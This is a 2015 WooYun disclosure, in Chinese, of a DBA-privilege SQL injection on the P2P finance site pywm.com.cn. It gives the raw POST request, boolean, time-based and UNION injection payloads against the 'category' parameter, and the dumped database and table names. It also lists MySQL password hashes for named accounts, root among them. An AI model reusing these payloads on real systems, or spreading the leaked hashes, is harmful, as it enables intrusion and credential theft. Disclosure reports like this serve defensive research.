当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131750

漏洞标题:p2p金融普益财富存在dba权限SQL注入漏洞(可脱全库获取大量敏感信息)

相关厂商:pywm.com.cn

漏洞作者: littelfire

提交时间:2015-08-05 09:27

修复时间:2015-09-20 12:00

公开时间:2015-09-20 12:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-05: 细节已通知厂商并且等待厂商处理中
2015-08-06: 厂商已经确认,细节仅向厂商公开
2015-08-16: 细节向核心白帽子及相关领域专家公开
2015-08-26: 细节向普通白帽子公开
2015-09-05: 细节向实习白帽子公开
2015-09-20: 细节向公众公开

简要描述:

test

详细说明:

普益财富主站存在sql注入漏洞,可以获取大量数据库用户敏感信息,和用户密码等信息。

漏洞证明:

注入连接:http://www.pywm.com.cn:80/issue_product---index.html
post型sql注入

POST /issue_product---index.html HTTP/1.1
Content-Length: 112
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.pywm.com.cn/
Cookie: PHPSESSID=db3fdf2a0148760f152971045d3c2af9; AJSTAT_ok_pages=1; AJSTAT_ok_times=1
Host: www.pywm.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
button=%c9%b8%d1%a1&category=1&duration=&issue_way=&sale_state=&start_point=


注入点是category

Parameter: category (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: button=%c9%b8%d1%a1&category=1 AND 9151=9151&duration=&issue_way=&sale_state=&start_point=
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: button=%c9%b8%d1%a1&category=1 AND (SELECT * FROM (SELECT(SLEEP(5)))aqky)&duration=&issue_way=&sale_state=&start_point=
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: button=%c9%b8%d1%a1&category=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162626271,0x66544c4854435a585251,0x7171766a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &duration=&issue_way=&sale_state=&start_point=


dba权限sql注入

1.jpg


看了一下dbs有43个数据库

2.jpg


[*] bugfree2
[*] bugtracker
[*] cardinfo
[*] cj
[*] club
[*] cnbene
[*] cnbene_address
[*] cnbene_data
[*] cnbene_product
[*] code
[*] crm
[*] data
[*] delete
[*] democnbene
[*] dotproject
[*] fpsale
[*] fund_sale_admin
[*] gd_noxm
[*] gdnx
[*] gdnx_develop
[*] getbook
[*] historical_data_bak
[*] hxbbank_data
[*] information_schema
[*] jishiyu
[*] lccp_admin
[*] man_crm
[*] market
[*] member
[*] mysql
[*] partners_db
[*] pms
[*] product
[*] search_demo
[*] session
[*] sms
[*] soocai
[*] terrace
[*] test
[*] test_cnbene
[*] test_crm
[*] webadmin
[*] webdata


跑了一下webadmin库内的数据

6.jpg


+-----------------------------+
| card_dealer_getaccount |
| card_dealer_info |
| card_dealer_record |
| card_self_dealer_getaccount |
| exam_itempool |
| exam_question |
| front_accesscontrol |
| front_accesscontrol_stock |
| front_analyst_info |
| front_answer |
| front_answer_del |
| front_article |
| front_article_class |
| front_customer_info |
| front_group |
| front_group_stock |
| front_history_comment |
| front_knowledgebase |
| front_mydata |
| front_questions |
| front_questions_del |
| front_questions_stock |
| front_questionstype |
| front_stocksearchcount |
| front_visit |
| productsale_customize |
| ss_admingroup |
| ss_admingroup_temp |
| ss_adminloginlog |
| ss_adminrights |
| ss_adminuser |
| ss_adminuser_temp |
| ss_uploads |
+-----------------------------+


ss_adminuser表中有大量人员的账号和密码信息

5.jpg


还可跑出数据库用户信息,有70个数据库用户

4.jpg


跑出了一部分用户的密码hash

3.jpg


[*] bakuser [1]:
password hash: *BEE0AEEF2541F1B630888FE9705FA6F35D03846F
[*] cacti_test [1]:
password hash: *1A7356A50FA41C99CC8B96FC509420DBB4F5A550
[*] check-run [1]:
password hash: *6208B34FF096647ABB1338FDFF4F3E2E5ADCFCB2
[*] chenlijun_data [1]:
password hash: *8E9A7586A36008AE5A8FF253F5E5EDC6A50A24FB
[*] cnbene [1]:
password hash: *170286FCEE6CEE7035604AB21E4BE1A99D18FFFA
[*] datacnbene [1]:
password hash: *BEE0AEEF2541F1B630888FE9705FA6F35D03846F
[*] dengpeng [1]:
password hash: *E7BDEC8B18803668B18A4DF103A67B326C921130
[*] fpsale [1]:
password hash: *A911D7ADDFE6AAE8CA1B4FA33E28715BE81C9FFC
[*] fuyongbin [1]:
password hash: *766B1257AC40C18E388EB2EF5E5F8A26BBE46E0D
[*] gd_slave_bank [1]:
password hash: *F178980EAF6DA3B984225EBBDBCBF19AE291FACC
[*] gdnx_data [1]:
password hash: *D4058F407F38D172227DEA5545158E2AD3E558CB
[*] lccp [1]:
password hash: *AC450753C5EA3F15EB732F54C911CE4403518E18
[*] man_crm [1]:
password hash: *6A64A15419C00B67DCD6E35923CEA04387BC1C07
[*] market [1]:
password hash: *A0732F1E1515599CE65ACCF72C1B5AF10AB49248
[*] pydata [1]:
password hash: *CC2CDBCABEA6824335E7489EB726BF8E8F6EF9D4
[*] root [1]:
password hash: *4C763986C2336568F959B9F71F72DD2EE639F55D
[*] search [1]:
password hash: *A05B5B0E6C4591DD1101ECF33675320155E4496F
[*] source_index [1]:
password hash: *B00940FBFEB128CF3A14D8591D89062CA6181008
[*] terrace [1]:
password hash: *95D7394837DD1E2F21F2472312E33A0F24BD71FF

修复方案:

做好过滤,求高rank。。。发了这么多有没有小礼物啊

版权声明:转载请注明来源 littelfire@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-08-06 11:58

厂商回复:

感谢

最新状态:

暂无